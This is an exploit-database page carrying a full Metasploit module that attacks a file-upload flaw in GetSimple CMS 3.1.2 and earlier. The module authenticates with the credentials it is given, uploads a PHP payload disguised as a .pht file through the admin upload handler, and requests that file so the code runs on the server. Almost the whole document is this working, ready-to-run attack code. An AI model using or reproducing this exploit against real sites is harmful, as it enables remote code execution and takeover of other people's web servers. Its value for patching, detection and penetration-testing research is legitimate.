GetSimpleCMS PHP File Upload



EKU-ID: 4247 CVE: OSVDB-ID: 93034
Author: Ahmed Elhady Mohamed Published: 2014-09-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GetSimpleCMS PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a file upload vulnerability in GetSimple CMS. By abusing the
        upload.php file, a malicious authenticated user can upload an arbitrary file,
        including PHP code, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Ahmed Elhady Mohamed'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['EDB', '25405'],
          ['OSVDB', '93034']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Generic (PHP Payload)', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 04 2014'
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'The full URI path to GetSimplecms', '/GetSimpleCMS']),
      OptString.new('USERNAME', [true, 'The username that will be used for authentication process']),
      OptString.new('PASSWORD', [true, 'The right password for the provided username'])
    ], self.class)
  end

  def send_request_auth
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path.to_s, "admin", "index.php"),
      'vars_post' => {
        'userid'    => "#{datastore['USERNAME']}",
        'pwd'       => "#{datastore['PASSWORD']}",
        'submitted' => 'Login'
      }
    })

    res
  end

  def send_request_upload(payload_name, cookie_http_header)
    data = Rex::MIME::Message.new
    data.add_part("<?php #{payload.encoded} ?>", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")
    data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")

    data_post = data.to_s

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path.to_s, "admin", "upload.php"),
      'vars_get' => { 'path' =>'' },
      'cookie'   => cookie_http_header,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data_post
    })

    res
  end

  def check
    res = send_request_cgi({'uri' => normalize_uri(target_uri.path.to_s, 'admin', 'index.php')})

    if res && res.code == 200 && res.body && res.body.to_s =~ /GetSimple CMS.*Version\s*([0-9\.]+)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end

    print_status("#{peer} - Version #{version} found")

    if Gem::Version.new(version) <= Gem::Version.new('3.1.2')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Authenticating...")
    res = send_request_auth

    if res && res.code == 302
      print_status("#{peer} - The authentication process is done successfully!")
    else
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
    end

    print_status("#{peer} - Extracting Cookies Information...")
    cookie = res.get_cookies
    if cookie.blank?
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
    end

    print_status("#{peer} - Uploading payload...")
    payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht'
    res = send_request_upload(payload_name, cookie)

    if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</
      upload_path = $1
      print_good("#{peer} - File uploaded to #{upload_path}")
      register_file_for_cleanup(payload_name)
    else
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_raw({
      'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name),
      'method' => 'GET'
    }, 5)
  end

end